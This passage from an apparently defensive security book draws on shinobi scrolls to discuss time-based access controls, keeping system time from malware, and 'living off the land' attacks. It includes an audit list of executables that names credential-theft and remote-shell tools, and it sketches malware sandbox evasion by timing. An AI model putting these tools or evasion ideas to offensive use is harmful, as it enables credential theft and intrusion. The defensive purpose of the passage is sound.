Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24

3

XENOPHOBIC SECURITY 25

If you accept strangers without much thought, the enemy shinobi may come in

disguised as a stranger and seek information from the inside.

Understanding Anti-Privilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26

The Problem with Interoperability and UniversalStandards . . . . . . . . . . . . . . . 27

Developing Unique Characteristics for YourEnvironment . . . . . . . . . . . . . . . . . 29

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . . 30

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31

4

IDENTIFICATION CHALLENGE 33

Though there are ancient ways for identifying marks, passwords, and

certificates, unless you invent new ones and rotate them, the enemy will

manage to infiltrate by having similar fake ones.

Understanding Authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35

Developing Matched-Pair Authenticators . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . . 38

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39

5

DOUBLE-SEALED PASSWORD 41

Sometimes, a set of signs such as pinching the nose or holding the ear should

be used with these passwords.

A Concealed 2-Step Authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43

Developing Double-Sealed Passwords . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . . 46

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47

6

HOURS OF INFILTRATION 49

After waiting until the hour of Ox, the ninja realized that the guard had fallen

asleep; everything was dead quiet, and the fire was out leaving all in darkness.

Understanding Time and Opportunities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50

Developing Time-Based Security Controls and Anomaly Detectors . . . . . . . . . . 51

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . . 54

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55

Contents in Detailxi

7

ACCESS TO TIME 57

You should start your attack with no delay and not prematurely but perfectly

on time.

The Importance of Time . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58

Keeping Time Confidential . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60

Determine Your Baseline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60

Assess Technical Capability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60

Establish Policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . . 61

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62

8

TOOLS 63

Remember, if you use a ninja tool, be sure to use it when the wind is

whistling so as to hide any sound and always retrieve it.

Living Off the Land . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65

Securing Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

,

the hours of the Boar (9:00 PM–11:00 PM),

the Rat (11:00 PM–1:00 AM), and the Hare (5:00 AM–7:00 AM), animals

oftheChinese zodiac.4

In addition, Bansenshūkai notes that some generals believed in “lucky

days,”5 divined through Chinese astrology. On these dates, attacks were

thought predestined for victory. If shinobi could identify enemy command-

ers who believed these superstitions, they could use that information—for

example, by predicting troop movements based on what the commander

believed to be a lucky or unlucky day to leave camp. When it comes to

predictable patterns of behavior, not much has changed. In this chapter,

we’ll discuss how the cyber equivalents of time-scheduled events can be

targeted by threat actors.

Understanding Time and Opportunities

Because people still rise, work, eat, relax, and sleep on roughly the same

schedule as the feudal Japanese, the hours of infiltration suggested by the

scrolls align closely with when employees are distracted, exhausted, or

made careless by the challenges of a modern workday—in other words,

the times they’re most vulnerable to attack. Consider the scrolls’ time

blocks in the context of network and information system activity and

usage patterns:

Hour of the Hare (5:00 AM–7:00 AM) Users wake up and log in

for the first time that day. Automated and manual systems boot up,

causing spikes in event logs and syslogs.

Hour of the Horse (11:00 AM–1:00 PM) Many users take lunch

breaks, meaning they log out of their systems or are timed out for

being idle. They may also surf the web for personal reasons—they

read the news, shop, check personal email, post to social media, or

perform other activities that might trigger anomaly detection systems.

Hour of the co*ck (5:00 PM–7:00 PM) Users find stopping points

for their work. They save files and perhaps rush to finish, greatly

increasing the risk of making mistakes in both their work and their

cybersecurity vigilance. For example, a worker might unthinkingly

open an attachment from an email that seems urgent. Users log out

Hours of Infiltration51

of accounts and systems en masse, but some are simply abandoned,

left to time out and disconnect.

Hour of the Boar (9:00 PM–11:00 PM) Most users are away from

work. Whether they’re at home, out socializing, or getting ready for

bed, the security of their work accounts and systems is probably not

at the front of their minds. Organizations with staffed overnight

SOC coverage typically see a shift change during this time, creating

a window for attackers to strike between user logins or while SOC

users are getting up to speed for the evening. The later the hour, the

greater the possibility that users—even those used to late hours—

get sleepy or let their guard down because things seem quiet.

Hour of the Rat (11:00 PM–1:00 AM) Networks and systems run

backups or other scheduled maintenance, generating noise in net-

work sensors and SIEMs. SOC users might have completed their

daily security and maintenance tasks and could be immersed in proj-

ect work.

Hour of the Tiger (3:00 AM–5:00 AM) Batch jobs, including pro-

cessing log files, running diagnostics, and initiating software builds,

typically execute during this time. Aside from SOC personnel, most

users sink into the deepest part of their sleep cycle and are not active

on their accounts.

Lucky Days There are also specific days, weeks, and months

when adversaries are likely to target systems and users. While most

organizational leaders don’t base activity on “lucky days,” threat

actors are certainly aware of regularly scheduled upgrades or

maintenance, when organizations take their defenses offline, and

of three-day weekends and company holidays, when systems and

accounts go largely unchecked. If potential threats have not been

considered, irregularities in network traffic and system logs could

go unnoticed during these windows of opportunity, allowing adver-

saries to conduct attacks, perform reconnaissance or command

and control (C2) communication, spread malware, or execute data

exfiltration.

Developing Time-Based Security Controls and

Anomaly Detectors

You can use the framework of the shinobi’s hours of infiltration to

develop time-based security that takes into account the baseline states

52Chapter 6

of the network at various times, deviations from baseline, and business

requirements. Applying time-based security is broadly achieved through

three steps:

1. Determine the activity baseline for each hour.

2. Train personnel to monitor activity and become very familiar

with typical activity during their assigned hours.

3. Assess the business needs for each hour. Based on this assess-

ment, create business logic and security axioms to further miti-

gate threats and detect anomalies.

First, consider dividing your network and system logs into one- or

two-hour segments. Review the historical trends and activity levels of your

network and systems to establish a baseline, a critical metric for threat

hunting and identifying cyberhygiene issues. Pay special attention to

times when attacks have occurred, as well as times that may be routinely

vulnerable to attack as determined by the organization’s circ*mstances,

threat modeling, and experience.

Once all the data has been segmented and baselined, train analysts,

system administrators, and security professionals to become extremely

familiar with your network’s activity patterns. They should also be aware

of the security gaps that organizational routines create. The shinobi

scrolls instruct guards to scrutinize every irregularity and incongruity

during their shift. For instance, they are expected to notice when a fish-

erman arrives later than normal or if an unfamiliar bird calls at an odd

hour. Having security personnel similarly attuned to incongruities could

prompt them to look twice at an abnormal event, which could reveal a

security incident. Developing this deep expertise might require assigning

security to monitor a sector—for instance, a single system that is consid-

ered a likely target—become extremely familiar with it, and then review

every log and event from that system for a two-hour time frame during

their eight-hour shift. This strategy is in stark contrast to the “monitor

everything at all times” mentality of most SOCs—a mentality that causes

alert fatigue, overload, and burnout. It should also mitigate the problems

of many automated anomaly detection systems, which need a human

to follow up on every anomaly and provide feedback and investigation.

These systems quickly become overwhelming and the data inscrutable to

security personnel who review anomalies on a daily or weekly basis.

Note that security logs are not ephemeral, like sounds in the night, but

are available for future analysis. It is plausible that a sophisticated adver-

sary might alter or eliminate security logs, filter traffic from network taps

and sensors, or otherwise compromise the systems intended to log their

Hours of Infiltration53

intrusion and alert security. However, these actions should disrupt a sys-

tem’s normal behavior enough that an astute security analyst takes notice.

Next, you will want to ask yourself two questions:

• When are your users and systems active?

• When could the adversary be active?

Understanding how and when users log into and operate your systems

helps you strategically constrain access, making it more difficult for an

external or internal threat to infiltrate at your most vulnerable times. For

example, if a system is not in use between 8:00 PM and 8:00 AM, turn off

that system during those hours. If users have no business need to access

their systems on Saturdays, then disable access to those systems for all

users on Saturdays. Disabling systems at scheduled times also helps train

your SOC staff to detect anomalies during specific hours, as there will be

fewer alerts and systems to review. NIST standards suggest implementing

,

such access controls, but many organizations choose instead to prioritize

certain scenarios for operational convenience in emergencies, however

unlikely these occurrences may be.

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider this scenario: you are the ruler of a medieval castle with valuable

information, treasure, and people inside . You receive credible intelligence

that a shinobi plans to infiltrate your castle . Imagine that your guards have

perfect knowledge of time but can enforce only the following rules:

• When any gate or door (interior or exterior) can be locked and

unlocked

• Curfews, after which anyone found in the halls will be detained

Consider what level of integrity, assurance, and security you might

achieve with the strict exercise of only those two time-based controls . How

would you train castle residents to operate within these strictures (how will

they use latrines at night, clean the premises while others sleep, take night

deliveries, and so on)? What compromises do you expect to make for your

security controls to be functional?

For this exercise, it is useful to draw a map of the imaginary castle or

your office building . Or you can use an abstracted layout of your network

map or data-flow diagram (DFD) as a “building,” where switches are hall-

ways, routers/firewalls are doors, systems are rooms, and VPNs/egress

points are gates .

54Chapter 6

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with an applicable secu-

rity control from the NIST 800-53 standard. Each should be evaluated

with the idea of hours of infiltration in mind. (Note that applications of

these techniques require that logs and alerts have timestamps and that

time across all systems be in sync. See AU-8: Time Stamps.)

1. Evaluate your hours of operation and perform threat model-

ing. When are you most vulnerable to attack? What can you do

to train your staff to be prepared? [NIST SP 800-154: Guide to

Data-Centric System Threat Modeling]6

2. Implement time-based privilege controls on accounts based on

users’ business and operational needs. For example, restrict

certain users’ ability to send or receive work email after 7:00

PM. [AC-2: Account Management | (6) Dynamic Privilege

Management]

3. Restrict the ability to log into or use specific accounts during

certain hours. For example, when there is an attempt to perform

unauthorized actions on an inactive account between 9:00 PM

and 11:00 PM, alert the user immediately to verify their identity.

If they are unresponsive or their authentication fails, alert the

SOC. [AC-2: Account Management | (11) Usage Conditions]

4. Leverage heuristic analysis systems to detect abnormal system

access or usage patterns during set times. Users should volun-

tarily document and provide insight into their “typical usage”

patterns to help model their expected behavior during their

workday. [AC-2: Account Management | (12) Account monitoring

for A-typical Usage]

5. Require system owners and users to document when systems

areexpected to be in use and when they could be powered off.

[AC-3: Access Enforcement | (5) Security Relevant Information]

6. Shrink the time frame during which adversaries can operate.

Define a strategic enterprise policy whereby sensitive or propri-

etary information should be accessed only during set times—for

instance, between 11:00 AM and 3:00 PM on weekdays. [AC-17:

Remote Access | (9) Disconnect/Disable Access]

7. Inform the account holder when they have successfully or unsuc-

cessfully logged in, including the time and date of last login.

Tracking this information helps a user alert the SOC if their

account has been compromised and tell the SOC when the

Hours of Infiltration55

unauthorized access occurred. [AC-9: Previous Login (Access)

Notification | (4) Additional Logon Information]

8. After establishing times of operation, configure user devices and

systems to automatically lock at a specified time, terminating all

sessions. [AC-11: Session Lock]

9. Document a policy that communicates the times and dates

that changes to infrastructure and systems are allowed. This

assists the SOC when evaluating network and configuration

changes on an hour-by-hour basis. [AU-12: Audit Generation |

(1) System Wide and Time Audit Correlation Trail; CM-5: Access

Restrictions for Change]

Debrief

In this chapter, you learned about the traditional Japanese time based

on Chinese zodiac animals, Chinese astrology’s influence on divination,

and how shinobi likely used these to seize opportunities to infiltrate or

outmaneuver a target. You have considered how network activity may vary

depending on the time of day and how you can reduce attack opportunity

through time-based controls. You became familiar with the shinobi’s secu-

rity standard. Specifically, you learned that a security guard was expected

to notice the smallest incongruity in their scanning sector—anything that

might indicate the presence of an adversary. In addition, you reviewed

guidance on how to apply some of these concepts to your threat hunting,

security operation processes, and anomaly detection systems.

In the next chapter, we will review an application of time confidenti-

ality, keeping the time a secret from malware, which may allow defenders

to exercise particular detection and defense options.

7

A C C E S S T O T I M E

You should start your attack with no delay and not

prematurely but perfectly on time.

If you are going to set fire to the enemy’s castle or camp, you need

to prearrange the ignition time with your allies.

—Yoshimori Hyakushu #83

When shinobi were on a mission, particularly at night,

one of their most crucial and complex duties was keeping

track of time. If this task seems simple, remember that

shinobi did not have watches or clocks. They didn’t even

have sand hourglasses until the early 1600s.1 To send and

receive signals at the proper time, coordinate attacks,

know when the enemy would be vulnerable, and more,

shinobi had to develop methods to tell time reliably.

Historically, one way to mark the hours involved lighting incense

or candles known to burn at a constant rate, then ringing a bell at cer-

tain intervals to announce the time. Bansenshūkai recommends using

environmental cues, such as the movement of the stars, or weight-based

instruments to tell time.2 These weight-based instruments were likely

58Chapter 7

water clocks, sometimes called clepsydras, that used balance and water

flow/weight mechanisms to accurately signal time intervals. Other scrolls

include more abstruse options, such as tracking the change in dilation of

a cat’s iris throughout the day or the subtle thermal expansions of a dwell-

ing during the night, as these align with particular hours.3 Shinobi were

even taught to derive the hour by being mindful of which nostril they

were more actively breathing through. The scrolls explain how breath

comes prominently in and out of one nostril, then alternates to the

other, in regular intervals that can be used to track time. While this idea

might seem like pseudoscience, in 1895, German scientist Richard Kayser

observed and documented that during the day, blood pools on differ-

ent sides of a person’s nose, causing a noticeable reduction in airflow in

one of the nostrils, before alternating to the other nostril.4 Not only did

the shinobi’s acute observational skills identify this phenomenon more

than 300 years before its scientific publication in the West, but they also

developed a practical application for it. For example, they might need

to lie down in the crawl space of a floor beneath their target, where they

would be unable to light candles or incense, use instruments to track

time, or even dare open their eyes should the glint from their eye catch

the target’s attention through the cracks of the floor. Under these uncom-

fortable circ*mstances, they would lie still and pay attention

,

to their nose

breath until the time to attack came—a stellar example of the shinobi’s

discipline, ingenuity, and creativity.

The multitude of references to time in the shinobi scrolls, combined

with the arduous methods developed to track time, suggests that these

techniques would not have been developed if keeping track of time were

not crucial for a threat actor to operate effectively. The ubiquity of cheap,

easy, and reliable ways of telling time in modern society has almost cer-

tainly conditioned us to take time and its measurement for granted.

In this chapter, we’ll reconsider the value and importance of time

in digital systems while briefly reviewing how it is generated, used, and

secured with existing best practices. Then we will ask: if accurate time is

so important to an adversary, what might happen if we could keep time

secret from them? Or deny the adversary access to time? Or even deceive

them with an inaccurate time?

The Importance of Time

Time is necessary for the operation of almost every modern computer sys-

tem. By synchronizing sequential logic and generating a clock signal that

dictates intervals of function, computers establish finite pulses of time.

These pulses are like the ticking of a clock in which systems perform

Access to Time59

operations on data in stable, reliable input/output environments. The

vast, intricate networks and systems that run our governments, econo-

mies, businesses, and personal lives operate on these pulses, requesting

the time continuously. They could not function without their clocks.

Numerous security controls exist to protect time data. Identity

authentication on Network Time Protocol (NTP) servers verifies that

an attacker is not spoofing a system’s trusted source of time. Encryption

andchecksums—encryption encodes the communication, and checksums

serve to detect errors during transmission—on the NTP server’s time

data verify its integrity and protect it from tampering. Nonce is an arbi-

trary randomized number added to the time communication to prevent

repeated- transmission errors. Timestamps and time synchronization log-

ging compare the system’s time to that reported by an authoritative time

source. NTP stays available and fault tolerant by leveraging multiple time

sources and alternate propagation methods, and if access to NTP is denied

or unavailable, backup methods can accurately estimate time based on

the last synchronization. Additional security best practices call for time-

stamping audit records, locking out sessions based on inactivity, restricting

access to accounts based on the time of day, assessing the validity of secu-

rity certificates and keys based on time and date information, establishing

when to create backups, and measuring how long to keep cached records.

These controls protect the integrity and availability of time data,

but rarely is enough consideration given to protecting time data’s con-

fidentiality. Almost any modern application can request the time at any

moment, and it is generally permitted access not only to the date and

time but also to clock libraries and functions. While NTP can encrypt

thetime data it communicates to a system, there is a notable lack of con-

trols around restricting access to the current system time. Identifying this

control gap is important because time is a critical piece of information

adversaries use to spread malware. The destructive Shamoon malware,5

for instance, was set to execute at the start of the Saudi Arabian weekend

to inflict maximum damage; it was designed to wipe all infected systems

before anyone would notice.

Other common attacks include disclosing confidential information,

causing race conditions, forcing deadlocks, manipulating information

states, and performing timing attacks to discover cryptography secrets.

More sophisticated malware can use its access to time to:

• Sleep for a set period to avoid detection

• Measure pi to 10 million digits, timing how long the calculation

takes to determine whether the infected system is in a sandbox/

detonation environment designed to catch malware

60Chapter 7

• Attempt to contact its command and control (C2) based on spe-

cific time instructions

• Discover metadata and other information through timing attacks

that reveal the state, position, and capability of the target system

If administrators could deny access to time (local, real, and lin-

ear), conducting operations within targeted information systems would

be much more difficult—and possibly infeasible—for the adversary.

However, it is important to note that haphazardly limiting time queries

will likely result in cascading failures and errors. A precise approach is

needed to deny access to time.

Keeping Time Confidential

Keep in mind that, because confidentiality is not as entrenched as other

forms of time security, applying such security controls will require special

effort from your organization and the greater security community.

Determine Your Baseline

Identify the software, applications, systems, and administrative commands

in your environment that require access to time. Implement function hook-

ing (interception of function calls) and logging to determine who and what

is requesting time. After establishing this baseline, use it to detect abnor-

mal time queries and inform a time-based needs assessment that will tailor

additional security controls (for example, Just in Time [JIT]).

Assess Technical Capability

Contact your hardware manufacturers and software vendors to deter-

mine what technical controls can be enabled to restrict access to time

functions. If there are no such controls, request that new features be

implemented to encourage the industry to develop solutions around

timeconfidentiality.

Establish Policy

Denying access to time is a nontraditional security control, but as with

more customary controls, enforcement requires establishing strategic

policy that details requirements—in this case, limiting access to time

and monitoring attempts to access time. Wherever possible, incorporate

the concept of time confidentiality in all change management decisions,

procurement of new hardware and software, and SOC prioritization.

Formally document new policies and ensure that your organization’s

CISO approves them.

Access to Time61

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets within . You receive credible threat intelligence that a shinobi

has infiltrated your castle with orders to set it on fire at precisely 3:00 am. At

night, a guard in a tower burns a candle clock and strikes a bell every 120

minutes to keep the other night guards on schedule—a sound you believe the

shinobi will also hear .

How can you control access to time to mitigate this threat? Which

trusted individuals within your castle require access to time, and to whom

can you deny complete access? Using only informational control of time,

what actions can you take to thwart the attack or discover the shinobi?

Recommended Security Controls

and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of time confidentiality in mind.

1. Implement protections that block access to time data in time-

stamp logs or other information-monitoring logs. Preventing

time spillage or timestamp leakage could require physical, envi-

ronmental, media, and technical controls. [AU-9: Protection of

Audit Information]

2. Review your current information architecture with respect to

time, including the philosophy, requirements, and tactics neces-

sary to implement access and confidentiality controls around

time data in your environment. If stakeholders agree to time

restrictions, document them in a security plan with an approved

budget, resources, and time dedicated to implementation.

[PL-8: Information

,

Security Architecture]

3. Conduct a log review and internal hunt to discover communica-

tion occurring over port 123 to any unofficial NTP servers in

your environment. Look for NTP communication to external

NTP servers and consider blocking access to NTP servers you do

not control. [SC-7: Boundary Protection]

62Chapter 7

Debrief

In this chapter, you learned about some of the tools shinobi used to tell

time and what they did with their knowledge of time. We discussed how

important time can be to cyber operations and security, noting that cur-

rent security practices focus primarily on the availability and integrity

of time in systems. You were also exposed to a thought exercise that

explored how to mitigate a shinobi attack through time manipulation.

In the following chapter, we will discuss how shinobi could turn many

things into tools to accomplish tasks. Understanding what the equivalent

digital “tools” are may help you detect and safeguard against novel weap-

onization of such tools or at least hamper their use.

8

T O O L S

Remember, if you use a ninja tool, be sure to use it when the

wind is whistling so as to hide any sound and always retrieve it.

No matter how many tools you carry as a shinobi,

remember, above all things, that you should always

have your food on your waist.

—Yoshimori Hyakushu #21

While Hollywood depictions typically show ninjas bran-

dishing throwing stars or a katana, real shinobi developed

a vast and eclectic array of tools and weapons, and they

were instructed to take great care choosing the right tool

for the job.1 All three shinobi scrolls dedicate substan-

tial space to describing secret tools, many of which were

innovative technology for their time. Bansenshūkai alone

includes five sizeable volumes about tools. It states, among

other directives, that the best tools can be used for multiple purposes, are

quiet, and are not bulky.2 Shōninki advises shinobi to limit the number

of tools they carry, as any piece of equipment has the potential to arouse

64Chapter 8

suspicion if it seems out of place.3 The scroll also recommends that shinobi

seek out and sabotage the tools and weapons of their targets; such instru-

ments were of central importance to a shinobi’s capabilities.4

Of course, shinobi did not acquire their tools from any big-box shi-

nobi supply store. Instead, according to the guidance of the scrolls, they

made effective tools from items that were easily bought, found, or made.

This approach had several advantages. Such everyday items could be

carried without attracting much suspicion5 and even act as corroborat-

ing props for shinobi disguises. For example, several rulers, including

Toyotomi Hideyoshi and Oda Nobunaga, called for sword hunts—mass

confiscations of all swords and other weapons from civilians—in an

effort to reduce the ability of rebels to attack the ruling army.6 Under

these conditions, any non-samurai who wore a sword or other arma-

ments in public could expect to have their weapons seized. To bypass

this tactic, shinobi discreetly modified common farm implements to

be used as weapons, as there was no edict against carrying sharp farm

tools in public. In the hands of a trained shinobi, everyday farm tools

becamelethal.

For all their practicality, Bansenshūkai asserts that the essential princi-

ple of using tools is not simply to wield them but to have an enlightened,

Zen-like understanding of their purpose.7 Shinobi contemplated their

tools’ usefulness deeply and frequently, constantly training with them

and reimagining their uses in the field. As a result, shinobi regularly

improved existing tools, invented new ones, and passed this knowledge

on to other, allied shinobi.8

In this chapter, we will contemplate tools. We’ll touch on the dual

nature of tools—how the same tool has the capability to do good or bad,

depending on its operator. This binary in-yo, or ying-yang, concept is a

useful model to understand how a hacker approaches digital tools. For

example, consider how a tool designed to help a user might be used for

malicious purposes.

In addition to possessing good-bad potential, each tool can also be

repurposed or applied in different ways. Take a moment to think of a

dozen or so ways one can use a hammer. Simple thought exercises like

this can help deepen your understanding of what exactly a hammer

is, how a hammer might be improved, and how a new type of hammer

might be invented to accomplish something novel. These same creative

skills can be applied to recoding digital and software-based tools. At

the highest levels of mastery, this creative repurposing is analogous

tothe work of a master blacksmith. The blacksmith can forge new tools,

machines, and systems that can dramatically change how they think

Tools65

about their own craft; open up new possibilities around what they can

build; and enhance their capabilities to develop new weapons, defenses,

and tools.

To be clear, the adversarial use of tools is likely a threat we will never

fully escape. That said, in this chapter, I will describe the security best

practices regarding tools, as well as some enhanced controls that may

mitigate attacks.

Living Off the Land

In cybersecurity, tools are any instruments that aid the manual or auto-

mated operation of a task. If that sounds like a widely inclusive defini-

tion, that’s because it is. There are physical tools, such as BadUSBs,

Wi-Fi sniffers, and lockpicks, and there are software tools, such as plat-

forms, exploits, code, scripts, and executables. An entire computer sys-

tem itself is a tool. A tool can have a legitimate use but, in the handsof

a hacker, become a weapon. Think, for example, of the SSH client an

administrator uses to perform remote maintenance on systems, which

an attacker can use for reverse SSH tunneling to attack systems and

bypass firewalls.

Much like shinobi, cyberadversaries rely heavily on tools to achieve

their goals, and they continuously develop, customize, hone, and testtheir

tools against existing technology in the wild. Sophisticated threat groups

employ full-time, dedicated tool and capability developers to maintain and

improve their tool set. In response, enterprising cyberdefenders work to

reverse engineer these custom tools so they can build countermeasures,

implement useful security policies and detection signatures, test mali-

cious tool capabilities in sandbox environments, and create application

whitelists that identify and block dangerous tools. In some cases, new

defenses are so well applied that adversaries cannot download or install

their tools to the target system, as the host-based security immediately

quarantines the tools, blocks access to them, and alerts security personnel

to their presence.

Because host-based security systems can detect and block specialized

tools and malware, many adversaries now practice an infiltration tactic

called “living off the land.” Using this approach, attackers first gather

intelligence on the software and tools already in use on the target sys-

tem. Then, they build their attack using only those applications, since

the host system’s defenses do not consider those applications harmful.

Aliving-off-the-land attack can use any file on the victim machine’s disk,

including the task scheduler, web browser, and Windows Management

66Chapter 8

Instrumentation (WMI) Command-Line Utility, as well as scripting

engines such as cmd/bat, JavaScript, Lua, Python, and VBScript. Much as

shinobi appropriated common items in the target environment, like farm

tools, which they knew would be readily available and blend in, hackers,

by co-opting what already exists on the target machine, can turn everyday

user and admin tools, applications, and operating system files into tools

for their purposes.

One common tool susceptible to exploitation on Windows machines

is Microsoft’s potent PowerShell framework. Even Microsoft acknowl-

edges that

,

threat actors regularly target PowerShell to infiltrate systems,

perform unauthorized actions, and otherwise compromise an organiza-

tion’s systems. In turn, Microsoft offers security and mitigation capa-

bilities, such as Privilege Access Management (PAM) to enforce Just

Enough Administration (JEA) in combination with Just in Time (JIT)

administration. Unfortunately, JEA/JIT turns PowerShell’s ubiquity

into an access control nightmare for human IT administrators. How?

I’ll spare you the more technical details. Just imagine a technician

whois called to come troubleshoot a problem, but is only allowed to

bring a screwdriver and can only access that screwdriver between 1:00

and 2:00PM.

Using access control measures to lock down tools works only if an

IT team is willing to severely restrict its own effectiveness. Even then,

there’s an inherent danger when these everyday tools exist on the target

system—cybersecurity professionals have observed threat actors freeing

tools from their local lock with ease. A fact of cybersecurity is this: as long

as these sophisticated tools exist, so does the potential to abuse them.

Securing Tools

The paradox of having tools is that you need them to operate, but so

does the adversary. One approach to this challenge is to reduce the num-

ber of tools—in terms of quantity, function, access, and availability—

to the bare minimum. While this strategy will make it somewhat dif-

ficult for you to operate inside your own environment, with adequate

security controls, it should make it even more difficult for a potential

adversary. One downside to this approach is that you are weakening the

resiliency and robustness of your capabilities to remotely manage your

environment. So, if an adversary compromises essential tools by remov-

ing or breaking them, your own protections may sabotage your ability

Tools67

to manage and repair the system. For securing tools, the following steps

are a good start:

1. Determine your baseline. Conduct role-based employee surveys

and perform software inventory audits across all systems in your

organization. Document a comprehensive list of users, version

numbers, and system locations for every tool in your environ-

ment, including all software/applications, scripts, libraries, sys-

tems, and roles. This includes OS and system files, such as the

following:

sc.exe find.exe sdelete.exe runasuser.exe

net.exe curl.exe psexec.exe rdpclip.exe

powershell.exe netstat.exe wce.exe vnc.exe

ipconfig.exe systeminfo.exe winscanx.exe teamviewer.exe

netsh.exe wget.exe wscript.exe nc.exe

tasklist.exe gpresult.exe cscript.exe ammyy.exe

rar.exe whoami.exe robocopy.exe csvde.exe

wmic.exe query.exe certutil.exe lazagne.exe

2. Review your findings and assess your needs. Evaluate every tool to

determine which users need it, as well as how, where, and when

it is used. For every tool, conduct a risk assessment to determine

the potential impact if an adversary gains access. Document

how you could restrict a tool’s capabilities to increase secu-

rity while incorporating justifiable compromises for business

operations—for example, disabling macros in Microsoft Word

and Excel.

3. Implement restrictions. Restrict availability, access, and authoriza-

tion for unnecessarily risky tools. Document any exceptions

and plan to revisit the exceptions every quarter to make users

request a renewal of their approval. You could even set tempo-

rary access that automatically revokes or deletes tools after a

period of time. Establish a whitelist of approved tools so that

any unrecognized or unauthorized tools are blocked automati-

cally from being delivered to your systems. Consider physically

locking all USB, media, Thunderbolt, FireWire, console, and

external ports on all systems, with written approval required to

unlock and use them.

68Chapter 8

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside . Your estate produces rare, proprietary threads that

are necessary for onsite textile construction and repair . They are also sold for

considerable sums—income that keeps your domain profitable . You receive

credible threat intelligence that a shinobi plans to infiltrate your castle and

poison the spindle needle on a spinning wheel, but it is unclear whom they

are targeting and what their objective is .

Model threat scenarios in which someone could be pricked by a spindle

needle . Then develop mitigations to lower the probability and impact of the

prick . For example, you might dull the needles or make people wear protec-

tive gloves in the spinning room . Could you reposition the spinning wheel

to make it harder for workers to accidentally bump or graze the needle?

What access controls could you place on transporting spindle needles within

the castle, and what supply chain protections could you implement on new

needles coming in? How many ways can you come up with to prevent the

poisoned needle from being used for malicious purposes? What other sharp

tools might workers substitute for needles, and should you remove access

to them? Could you even redesign the spindle wheel to operate without

aneedle?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of tools in mind.

1. Evaluate your technical capability to enforce the “principle of

least functionality” by disabling, deleting, and restricting access

to unnecessary software and system functions in your environ-

ment. [CM-7: Least Functionality]

2. Conduct periodic reviews of the functions, tools, and software

used for each role and system to determine whether they are nec-

essary or whether they could be removed or disabled. Establish

a system to register, track, and manage these tools. [CM-7: Least

Functionality | (1) Periodic Review | (3) Registration Compliance]

3. After documenting every tool that a user or system could lever-

age, restrict users from putting those tools to use for functions

Tools69

outside the user’s role in the organization. [CM-7: Least

Functionality | (2) Prevent Program Execution]

4. Implement a whitelist or blacklist (or both) of software, appli-

cations, and other tools. [CM-7: Least Functionality | (4)

Unauthorized Software/Blacklisting | (5) Authorized

Software/Whitelisting]

5. Implement physical and network boundary restrictions on hard-

ware and software tools. For example, restrict sensitive tools to

a segregated management-net file server or in portable locked

media devices, to be accessed only when needed and in combina-

tion with JEA/JIT access controls. [MA-3: Maintenance Tools

| (1) Inspect Tools | (3) Prevent Unauthorized Removal | (4)

Restricted Tool Use; SC-7: Boundary Protection | (13) Isolation of

Security Tools/Mechanisms/Support Components]

6. Evaluate all installed software to determine which imports, APIs,

functional calls, and hooks are used by applications known to be

safe. Consider using malcode protections to block any tools that

use these implementations or others that normal software does

not use. Consider your options to restrict, disable, and remove OS

functions, modules, components, and libraries that are not used

for business operations. [SA-15: Development Process, Standards,

and Tools | (5) Attack Surface; SI-3:Malicious Code Protection |

(10) Malicious Code Analysis]

Debrief

In this chapter, you learned about tools—how powerful they are and why

it’s important to keep them safe. You learned about “living off the land”

and the complexity of making systems both defensible and functional.

You may have also started to ponder the distinctions between tools and

malware, as well as how one might program a tool to identify the differ-

ences between the two. The thought exercise of the poisoned spindle

challenged you to outwit

,

the enemy who’s invading an environment you

control.

In the following chapter, we will discuss different techniques used by

shinobi scouts—smelling, seeing, and hearing—and what we can learn

from them, particularly as we apply different types of digital sensors in

our cyber environment.

9

S E N S O R S

Whether day or night, scouts for a far-distance

observation should be sent out.

Even if a shinobi does not have impressive physical abilities,

remember that the most vital thing is to have acute observation.

—Yoshimori Hyakushu #11

In addition to stationing guards at gates and soldiers at

watch posts, Bansenshūkai recommends defending a castle

by placing scouts surreptitiously along roads, paths, and

other approaches. The defending commander should

place scouts at staggered intervals around the castle’s

perimeter.1 These scouts fulfilled one of three roles:

• Smelling scouts (kagi)

• Listening scouts (monogiki)

